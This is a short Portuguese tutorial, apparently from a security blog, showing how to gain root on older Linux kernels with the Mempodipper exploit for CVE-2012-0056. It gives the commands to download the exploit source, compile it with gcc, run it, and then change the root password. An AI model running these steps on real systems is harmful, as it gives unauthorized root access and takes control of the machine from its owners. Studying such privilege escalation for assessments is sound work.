A vulnerabilidade exibida no CVE-2012-0056 destaca a possibilidade de inserir um shell code na memória e obter acesso como root no kernel 2.6.39 e outras versões.

É um recurso interessante que pode lhe auxiliar durante a avaliação de segurança.

01 - Passo

Logue com um usuário comum e verifique a versão no kernel.

Linux
uname -r

02 - Passo

Realize o download do exploit mempodipper.c.

Linux
wget www.100security.com.br/downloads/mempodipper.c

03 - Passo

Liste o arquivo mempodipper.c.

Linux
ls -l

04 - Passo

Compile o exploit utilizando o GCC.

Linux
gcc mempodipper.c -o mempodipper

05 - Passo

O exploit mempodipper foi compilado.

Linux
ls -l

06 - Passo

Execute o exploit.

Linux
./mempodipper

07 - Passo

Acesso como root realizado com sucesso!

Linux
./mempodipper

08 - Passo

Altere a senha do root.

Linux
passwd

09 - Passo

Acesso como root com a nova senha realizada com sucesso!


👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2024 - 100SECURITY

Contato